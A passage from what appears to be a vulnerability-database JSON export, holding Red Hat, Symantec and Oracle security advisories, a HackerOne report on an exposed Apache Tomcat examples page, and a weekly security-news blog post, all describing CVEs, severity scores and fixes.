"version": "3.0"}, "impactScore": 3.6}, "published": "2019-11-20T16:01:32", "type": "redhat", "title": "(RHSA-2019:3931) Important: Red Hat JBoss Web Server 5.2 security release", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5407", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-10072", "CVE-2019-1559"], "modified": "2019-12-02T16:20:59", "id": "RHSA-2019:3931", "href": "https://access.redhat.com/errata/RHSA-2019:3931", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:36:17", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 5.2 serves as a replacement for Red Hat JBoss Web Server 5.1, and includes bug fixes, enhancements, and component upgrades, which are documented in the Release Notes, linked to in the References.\n\nSecurity Fix(es):\n\n* openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) (CVE-2018-5407)\n\n* openssl: 0-byte record padding oracle (CVE-2019-1559)\n\n* tomcat: HTTP/2 connection window exhaustion on write, incomplete fix of CVE-2019-0199 (CVE-2019-10072)\n\n* tomcat: XSS in SSI printenv (CVE-2019-0221)\n\n* tomcat: Apache Tomcat HTTP/2 DoS (CVE-2019-0199)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-11-20T15:52:12", "type": "redhat", "title": "(RHSA-2019:3929) Important: Red Hat JBoss Web Server 5.2 security release", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5407", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-1559"], "modified": "2020-03-04T15:22:15", "id": "RHSA-2019:3929", "href": "https://access.redhat.com/errata/RHSA-2019:3929", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2022-01-11T11:31:35", "description": "**Summary**\n\nSymantec SWG products using affected versions of Apache Tomcat may be susceptible to multiple vulnerabilities. A remote attacker can execute arbitrary code on the target host, hijack an authenticated Tomcat user's session, redirect a Tomcat user to an arbitrary URL, execute arbitrary JavaScript code in a Tomcat user's web browser, bypass a web proxy in front of the Tomcat server, or cause denial of service. A local user can escalate their privileges on the system. \n \n\n\n**Affected Product(s)**\n\nThe following products and product versions are vulnerable to the CVEs listed for each product.\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-11784, CVE-2020-1935 | 6.7 | Upgrade to 6.7.5.3. \n7.1 | Remediation will not be provided. \n7.2 | Upgrade to 7.2.1.1. \n \n \n\n**Content Analysis (CA)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-11784 | 2.3 | Upgrade to 2.3.5.1. \n2.4 and later | Not vulnerable, fixed in 2.4.1.1 \nCVE-2020-1935 | 2.3 | Upgrade to a later version with fixes. \n2.4, 3.0 | Remediation is not available at this time. \n3.1 | Not vulnerable, fixed in 3.1.0.0 \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2019-17563, CVE-2020-1935 | 2.3, 2.4 | Upgrade to a later version with fixes. \n3.0 | Not vulnerable, fixed in 3.0.1.1 \n \n \n\n**Symantec Messaging Gateway (SMG)** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2020-1935 | 10.7 | Remediation is not available at this time. \n \n \n\n**Additional Product Information**\n\nCVE-2020-1935 is exploitable in ASG, CA, and MC only when the products are deployed behind a reverse proxy.\n\nCVE-2020-1935 is exploitable in SMG only when the SMG Control Center is deployed behind a reverse proxy. SMG Scanners are not vulnerable to CVE-2020-1935 even when deployed behind a reverse proxy.\n\nThe following products are not vulnerable: \n**AuthConnector \nBCAAA \nCacheFlow (CF) \nGeneral Auth Connector Login Application \nHSM Agent for the Luna SP \n****PacketShaper (PS) S-Series \nPolicyCenter (PC) S-Series \nProxySG \nReporter \nSecurity Analytics (SA) \nSSL Visibility (SSLV) \nUnified Agent \nWeb Isolation (WI) \nWSS Agent \nWSS Mobile Agent \n \n**\n\n**Issue Details**\n\n**CVE-2018-11784** \n--- \n**Severity / CVSS v3.0:** | Medium / 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) \n**References:** | NVD: [CVE-2018-11784](<https://nvd.nist.gov/vuln/detail/CVE-2018-11784> \"NVD - CVE-2018-11784\" ) \n**Impact:** | Open redirection \n**Description:** | An open redirection flaw in the default servlet allows a remote attacker to cause a user to follow a crafted URL and redirect the user to an arbitrary URL of the attacker's choice. \n \n \n\n**CVE-2019-0199** \n--- \n**Severity / CVSS v3.0:** | High / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n**References:** | NVD: [CVE-2019-0199](<https://nvd.nist.gov/vuln/detail/CVE-2019-0199> \"NVD - CVE-2019-0199\" ) \n**Impact:** | Denial of service \n**Description:** | A flaw in the HTTP/2 implementation allows a remote attacker to generate crafted streams to the web server and cause denial of service through thread exhaustion. \n \n \n\n**CVE-2019-0221** \n--- \n**Severity / CVSS v3.0:** | Medium / 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n**References:** | NVD: [CVE-2019-0221](<https://nvd.nist.gov/vuln/detail/CVE-2019-0221> \"NVD - CVE-2019-0221\" ) \n**Impact:** | Cross-site scripting (XSS) \n**Description:** | A reflected XSS flaw in the SSI printenv command allows a remote attacker to cause a user to follow a crafted URL and execute injected JavaScript code in the user's browser. \n \n \n\n**CVE-2019-0232** \n--- \n**Severity / CVSS v3.0:** | High / 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2019-0232](<https://nvd.nist.gov/vuln/detail/CVE-2019-0232> \"NVD - CVE-2019-0232\" ) \n**Impact:** | Remote code execution \n**Description:** | A flaw in the CGI servlet on Windows platforms allows a remote attacker to execute arbitrary code on the target host. \n \n \n\n**CVE-2019-10072** \n--- \n**Severity / CVSS v3.0:** | High / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n**References:** | NVD: [CVE-2019-10072](<https://nvd.nist.gov/vuln/detail/CVE-2019-10072> \"NVD - CVE-2019-10072\" ) \n**Impact:** | Denial of service \n**Description:** | A flaw in the HTTP/2 implementation allows a remote attacker to generate crafted streams to the web server and cause denial of service through thread exhaustion. This is caused by an incomplete fix for CVE-2019-0199. \n \n \n\n**CVE-2019-12418** \n--- \n**Severity / CVSS v3.0:** | High / 7.0 (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2019-12418](<https://nvd.nist.gov/vuln/detail/CVE-2019-12418> \"NVD - CVE-2019-12418\" ) \n**Impact:** | Privilege escalation \n**Description:** | A flaw in the JMX Remote Lifecycle Listener allows a local attacker to manipulate the local RMI registry and escalate their privileges on the system by capturing credentials for the JMX interface and gaining control of the Tomcat server. \n \n \n\n**CVE-2019-17563** \n--- \n**Severity / CVSS v3.0:** | High / 7.5 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2019-17563](<https://nvd.nist.gov/vuln/detail/CVE-2019-17563> \"NVD - CVE-2019-17563\" ) \n**Impact:** | Session hijacking \n**Description:** | A flaw in FORM authentication allows a remote attacker to perform a session fixation attack and take over a user's authentication session. \n \n \n\n**CVE-2019-17569** \n--- \n**Severity / CVSS v3.0:** | Medium / 4.8 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N) \n**References:** | NVD: [CVE-2019-17569](<https://nvd.nist.gov/vuln/detail/CVE-2019-17569> \"NVD - CVE-2019-17569\" ) \n**Impact:** | Security control bypass \n**Description:** | A flaw in HTTP Transfer-Encoding header processing allows a remote attacker to perform an HTTP request smuggling attack and bypass a reverse proxy in front of the Tomcat server. The reverse proxy must handle the Transfer-Encoding header incorrectly in a particular way. \n \n \n\n**CVE-2020-1935** \n--- \n**Severity / CVSS v3.0:** | Medium / 4.8 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N) \n**References:** | NVD: [CVE-2020-1935](<https://nvd.nist.gov/vuln/detail/CVE-2020-1935> \"NVD - CVE-2020-1935\" ) \n**Impact:** | Security control bypass \n**Description:** | A flaw in HTTP header processing allows a remote attacker to perform an HTTP request smuggling attack and bypass a reverse proxy in front of the Tomcat server. The reverse proxy must handle the Transfer-Encoding header incorrectly in a particular way. \n \n \n\n**CVE-2020-1938** \n--- \n**Severity / CVSS v3.0:** | Critical / 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n**References:** | NVD: [CVE-2020-1938](<https://nvd.nist.gov/vuln/detail/CVE-2020-1938> \"NVD - CVE-2020-1938\" ) \n**Impact:** | Information disclosure, remote code execution \n**Description:** | A flaw in the AJP connector allows a remote attacker to read arbitrary files from the target server. If the server allows file uploads and JSP processing, the remote attacker can also execute arbitrary code on the target server. \n \n** \nRevisions**\n\n2021-04-26 PacketShaper (PS) S-Series and PolicyCenter (PC) S-Series are not vulnerable. \n2021-02-18 A fix for CA 2.3 and MC 2.4 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-11-12 Content Analysis 3.1 is not vulnerable because a fix is available in 3.1.0.0. \n2020-08-19 MC 3.0 is not vulnerable because a fix is available in 3.0.1.1. A fix for MC 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-06-01 A fix for Advanced Secure Gateway (ASG) 7.2 is available in 7.2.1.1. \n2020-05-12 initial public release \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T19:02:01", "type": "symantec", "title": "Apache Tomcat Vulnerabilities Oct 2018 \u2013 Feb 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11784", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-12418", "CVE-2019-17563", "CVE-2019-17569", "CVE-2020-1935", "CVE-2020-1938"], "modified": "2022-01-10T20:18:02", "id": "SMNTC-1765", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-02-03T01:41:09", "bounty": 0.0, "description": "**Summary:**\nThere are multiple issues found on \u2588\u2588\u2588:\n1. \u2588\u2588\u2588\u2588\u2588\u2588\u2588/examples/ - Apache Tomcat examples are available for public. Multiple issues - session and cookies manipulation, internals IP disclosure.\n2. Error page contains information about Apache Tomcat version\n3. Reported Tomcat version is vulnerable. Multiple CVEs - critical, high and medium\n\n**Description:**\n1. Examples are available by link: \u2588\u2588\u2588\u2588\u2588\u2588\u2588/examples/\n\n2. Information disclosure about Apache Tomcat version\n\n3. Vulnerable version Apache Tomcat/8.5.33\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-1938\nBase Score: 9.8 CRITICALVector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-0232\nBase Score: 8.1 HIGH Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-17563\nBase Score: 7.5 HIGH Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-10072\nBase Score: 7.5 HIGH Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-0199\nBase Score: 7.5 HIGH Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-1967\nBase Score: 7.5 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-12418\nBase Score: 7.0 HIGH Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-0221\nBase Score: 6.1 MEDIUM Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2019-2684\nBase Score: 5.9 MEDIUM Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-1935\nBase Score: 4.8 MEDIUM Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2018-11784\nBase Score: 4.3 MEDIUM Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n\n## Impact\nMore than Critical. The system is vulnerable. Exploits are available.\n\n## Step-by-step Reproduction Instructions\n\n1. Navigate to \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/examples/\nYou will see the standard examples page. Servlets allow to modify cookies and sessions.\n2. Navigate to any non exists address to get the Apache Tomcat version\nE.g. \u2588\u2588\u2588/examples/Readme\n\n## Product, Version, and Configuration (If applicable)\nApache Tomcat/8.5.33\n\n## Suggested Mitigation/Remediation Actions\n1. Upgrade Tomcat\n2. Remove /examples\n3. Change the configuration - display a custom 404 page\n\n## Impact\n\nMore than Critical. The system is vulnerable. Exploits are available.\nIn the An attacker can change session and cookies. Potential sessions interception.\nCVEs: Critical -1, High - 6, Medium - 4", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-14T19:38:44", "type": "hackerone", "title": "U.S. Dept Of Defense: Tomcat examples available for public, Disclosure Apache Tomcat version, Critical/High/Medium CVE", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11784", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-12418", "CVE-2019-17563", "CVE-2019-2684", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1967"], "modified": "2020-06-11T18:17:21", "id": "H1:874427", "href": "https://hackerone.com/reports/874427", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). "The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." \nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. \n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n![](http://feeds.feedburner.com/~r/avleonov/~4/gHnqqNZIYuo)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2022-10-24T19:59:02", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 334 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ January 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2627487.1>).\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-01-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - January 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1695", "CVE-2012-3135", "CVE-2014-3004", "CVE-2014-3596", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2183", "CVE-2016-4000", "CVE-2016-5019", "CVE-2016-6306", "CVE-2016-6814", "CVE-2016-8610", "CVE-2017-1000376", "CVE-2017-12626", "CVE-2017-14735", "CVE-2017-15708", "CVE-2017-15906", "CVE-2017-5645", "CVE-2018-0734", "CVE-2018-0735", "CVE-2018-1000030", "CVE-2018-1060", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-11759", "CVE-2018-11784", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-14718", "CVE-2018-15473", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-16395", "CVE-2018-17189", "CVE-2018-19362", "CVE-2018-20684", "CVE-2018-5407", "CVE-2018-6829", "CVE-2018-8032", "CVE-2018-8039", "CVE-2019-0199", "CVE-2019-0215", 